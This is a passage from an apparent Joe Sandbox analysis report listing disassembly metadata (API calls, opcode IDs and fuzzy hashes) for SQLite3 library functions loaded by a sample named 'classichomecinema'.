                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stricmp
                                                                                        • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                        • API String ID: 912767213-1308749736
                                                                                        • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                        • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                        • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                        • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                        • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                        • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                          • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4082478743-0
                                                                                        • Opcode ID: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                                        • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                        • Opcode Fuzzy Hash: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                                        • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                          • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                          • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                          • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                        • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID: BINARY$INTEGER
                                                                                        • API String ID: 317512412-1676293250
                                                                                        • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                        • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                        • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                        • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                                                        • sqlite3_step.SQLITE3 ref: 6094B590
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                                                        • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 2802900177-0
                                                                                        • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                        • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                                                        • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                        • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                          • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                          • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                          • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                        • String ID:
                                                                                        • API String ID: 4038589952-0
                                                                                        • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                        • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                        • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                        • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                        APIs
                                                                                          • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                          • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                          • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                          • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094C719
                                                                                        • sqlite3_step.SQLITE3 ref: 6094C72A
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094C73B
                                                                                          • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                          • Part of subcall function 6094A9F5: sqlite3_free.SQLITE3(?,?,?,00000000,?,?,6094AC3F), ref: 6094AA7A
                                                                                        • sqlite3_free.SQLITE3 ref: 6094C881
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_freesqlite3_resetsqlite3_step$memmovesqlite3_column_int64
                                                                                        • String ID:
                                                                                        • API String ID: 3487101843-0
                                                                                        • Opcode ID: 010aee262a3d8dae5049234a4ef50880699508b325a3cdc2c8e6f431e5b9abd3
                                                                                        • Instruction ID: dadb85a3919e548a164012fc2e04d9b0ab11445217433cc10b515e99a95ed5c3
                                                                                        • Opcode Fuzzy Hash: 010aee262a3d8dae5049234a4ef50880699508b325a3cdc2c8e6f431e5b9abd3
                                                                                        • Instruction Fuzzy Hash: 3681FA74A046098FCB44DF99C480A9DF7F7AFA8354F258529E855AB314EB34EC46CF90
                                                                                        APIs
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                          • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                        • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                        • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 247099642-0
                                                                                        • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                        • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                        • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                        • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                        APIs
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                        • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                          • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                                        • String ID:
                                                                                        • API String ID: 326482775-0
                                                                                        • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                        • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                        • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                        • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B71E
                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B73C
                                                                                        • sqlite3_step.SQLITE3 ref: 6094B74A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64$sqlite3_mutex_leavesqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 3305529457-0
                                                                                        • Opcode ID: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                                        • Instruction ID: cea3564161c85327b61b62d60446574847d05a2bcfebeda4641ea5396b37aa5a
                                                                                        • Opcode Fuzzy Hash: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                                        • Instruction Fuzzy Hash: D401A8B45047049FCB00DF19D9C968ABBE5FF98354F158869FC888B305D374E8548BA6
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1477753154-0
                                                                                        • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                        • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                                        • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                        • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                                        APIs
                                                                                          • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 609255B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1465156292-0
                                                                                        • Opcode ID: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                        • Instruction ID: 19c4c58ecb434a21204d9b38047e93a23a7f28015e8477a734fda6841bb58fe8
                                                                                        • Opcode Fuzzy Hash: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                        • Instruction Fuzzy Hash: 56317AB4A082188FCB04DF69D880A8EBBF6FF99314F008559FC5897348D734D940CBA5
                                                                                        APIs
                                                                                          • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1465156292-0
                                                                                        • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                        • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                                        • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                        • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                                        APIs
                                                                                          • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1465156292-0
                                                                                        • Opcode ID: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                                        • Instruction ID: 4fd0dfe8dd6226820e052206e0db6187a6d8a97f2116fb4a305c2fd2856f8961
                                                                                        • Opcode Fuzzy Hash: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                                        • Instruction Fuzzy Hash: 94F08CB5A002099BCB00DF2AD88088ABBBAFF98264B05952AEC049B314D770E941CBD0
                                                                                        APIs
                                                                                          • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 60925678
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 1465156292-0
                                                                                        • Opcode ID: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                                                        • Instruction ID: bc2fa39936d9f4ed0ba1ebf98b65e017ff83ed2bbf5e058a49948814e7f33c49
                                                                                        • Opcode Fuzzy Hash: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                                                        • Instruction Fuzzy Hash: 59E0EC74A042089BCB04DF6AD4C194AB7F9EF58258B14D665EC458B309E231E9858BC1
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556638118.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3556625758.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556789250.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556885858.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556907336.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556921582.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3556934746.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_classichomecinema.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                                                        • String ID:
                                                                                        • API String ID: 3064317574-0
                                                                                        • Opcode ID: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
